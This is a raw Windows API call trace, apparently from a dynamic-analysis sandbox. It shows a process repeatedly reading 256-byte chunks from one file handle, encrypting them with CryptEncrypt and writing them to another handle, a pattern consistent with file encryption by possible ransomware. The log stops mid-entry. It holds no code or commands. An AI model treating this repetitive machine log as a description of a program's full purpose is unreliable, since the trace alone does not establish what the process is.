[0170.517] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.518] GetLastError () returned 0x0 [0170.518] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.518] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.518] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.518] GetLastError () returned 0x0 [0170.518] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.518] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.518] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.518] GetLastError () returned 0x0 [0170.518] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.518] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.518] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.518] GetLastError () returned 0x0 [0170.518] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.518] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.518] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.518] GetLastError () returned 0x0 [0170.519] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.519] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.519] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.519] GetLastError () returned 0x0 [0170.519] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.519] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.519] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.519] GetLastError () returned 0x0 [0170.519] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.519] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.519] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.519] GetLastError () returned 0x0 [0170.519] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.519] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.519] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.519] GetLastError () returned 0x0 [0170.519] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.520] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.520] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.520] GetLastError () returned 0x0 [0170.520] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.520] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.520] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.520] GetLastError () returned 0x0 [0170.520] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.520] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.520] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.520] GetLastError () returned 0x0 [0170.520] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.520] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.520] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.520] GetLastError () returned 0x0 [0170.520] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.520] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.521] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.521] GetLastError () returned 0x0 [0170.521] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.521] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.521] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.521] GetLastError () returned 0x0 [0170.521] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.521] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.521] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.521] GetLastError () returned 0x0 [0170.521] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.521] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.521] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.521] GetLastError () returned 0x0 [0170.521] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.522] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.522] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.522] GetLastError () returned 0x0 [0170.522] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.522] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.522] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.522] GetLastError () returned 0x0 [0170.522] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.522] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.522] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.522] GetLastError () returned 0x0 [0170.522] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.522] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.522] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.522] GetLastError () returned 0x0 [0170.522] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.523] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.523] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.523] GetLastError () returned 0x0 [0170.523] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.523] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.523] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.523] GetLastError () returned 0x0 [0170.523] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.523] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.523] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.523] GetLastError () returned 0x0 [0170.523] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.523] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.523] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.523] GetLastError () returned 0x0 [0170.523] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.523] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.524] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.524] GetLastError () returned 0x0 [0170.524] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.524] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.524] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.524] GetLastError () returned 0x0 [0170.524] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.524] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.524] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.524] GetLastError () returned 0x0 [0170.524] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.524] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.524] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.524] GetLastError () returned 0x0 [0170.524] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.524] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.524] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.524] GetLastError () returned 0x0 [0170.524] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.525] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.525] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.525] GetLastError () returned 0x0 [0170.525] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.525] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.525] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.525] GetLastError () returned 0x0 [0170.525] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.525] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, 